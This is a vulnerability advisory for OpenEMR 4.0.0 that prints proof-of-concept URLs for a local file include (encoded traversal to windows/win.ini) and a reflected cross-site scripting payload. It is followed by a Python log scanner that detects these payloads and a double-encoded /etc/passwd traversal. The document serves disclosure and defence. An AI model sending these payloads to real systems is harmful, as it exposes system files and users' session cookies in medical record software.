OpenEMR is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Vendor:
http://www.sourceforge.net/projects/openemr/
http://www.oemr.org/
OpenEMR 4.0.0 is vulnerable; other versions may also be affected.
Exploit:
Local file include:
http://www.example.com/openemr-4.0.0/index.php?site=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
Cross-site scripting:
http://www.example.com/openemr-4.0.0/setup.php?site=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/openemr-4.0.0/gacl/admin/object_search.php?object_type=&action
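Both issues above ride on the same `site` query parameter, so a defender can triage web-server logs for it directly. The following Python script is an added example, not part of this advisory and not OpenEMR's own code: it parses common-log-format lines (the sample lines are constructed here, not captured traffic), URL-decodes the `site` value repeatedly so that double-encoded traversal is not missed, and classifies each value as directory traversal, script injection, or a value that simply fails the allowlist a site identifier should satisfy. The `site_value_allowed` function is the mitigation side of the same rule: a site id should be a plain directory-name token, never a path.

```python
import re
import urllib.parse
from typing import List, Optional, Tuple

# Constructed sample access-log lines (common log format); not real traffic.
# The payloads are the ones published in the advisory plus a double-encoded variant.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2011:10:00:01 +0000] "GET /openemr-4.0.0/index.php?site=default HTTP/1.1" 200 5123
203.0.113.7 - - [01/Mar/2011:10:00:02 +0000] "GET /openemr-4.0.0/index.php?site=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 412
203.0.113.9 - - [01/Mar/2011:10:00:03 +0000] "GET /openemr-4.0.0/setup.php?site=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 3001
203.0.113.9 - - [01/Mar/2011:10:00:04 +0000] "GET /openemr-4.0.0/setup.php?site=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 3001
203.0.113.11 - - [01/Mar/2011:10:00:05 +0000] "GET /openemr-4.0.0/interface/login/login.php HTTP/1.1" 200 2210
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Allowlist a legitimate site identifier satisfies: a single directory-name token.
SITE_OK_RE = re.compile(r'^[A-Za-z0-9_-]{1,64}$')
# Markers of script injection in a decoded value.
SCRIPT_RE = re.compile(r'<\s*script|javascript:|on\w+\s*=', re.IGNORECASE)


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until the value stops changing, capped so a pathological
    input cannot loop; this catches %252e-style double encoding."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def site_value_allowed(raw_site: str) -> bool:
    """Mitigation-side check: accept only a plain site-id token after decoding."""
    return bool(SITE_OK_RE.match(fully_decode(raw_site)))


def classify_site_value(raw_site: str) -> Optional[str]:
    """Return 'traversal', 'xss', 'malformed', or None for a benign value."""
    decoded = fully_decode(raw_site)
    normalised = decoded.replace('\\', '/')   # treat backslash traversal like '/'
    if '../' in normalised or normalised.startswith('/') or re.match(r'^[A-Za-z]:/', normalised):
        return 'traversal'
    if SCRIPT_RE.search(decoded):
        return 'xss'
    if not site_value_allowed(raw_site):
        return 'malformed'
    return None


def scan_access_log(text: str) -> List[Tuple[str, str, str]]:
    """Yield (client_ip, request_target, finding) for every suspicious 'site' value."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group('target')
        query = urllib.parse.urlsplit(target).query
        # parse_qs performs one decoding round; fully_decode handles the rest.
        params = urllib.parse.parse_qs(query, keep_blank_values=True)
        for raw_site in params.get('site', []):
            kind = classify_site_value(raw_site)
            if kind:
                findings.append((line.split()[0], target, kind))
    return findings


if __name__ == '__main__':
    for client, target, kind in scan_access_log(SAMPLE_LOG):
        print(f'{kind:10} {client:15} {target}')
```

Run against the constructed sample, the script flags the two advisory payloads and the double-encoded variant while leaving `site=default` and the login request alone. The decoding loop is the point worth carrying into a real rule: a detector that decodes only once sees `%2e%2e%2f` and never the `../` behind it.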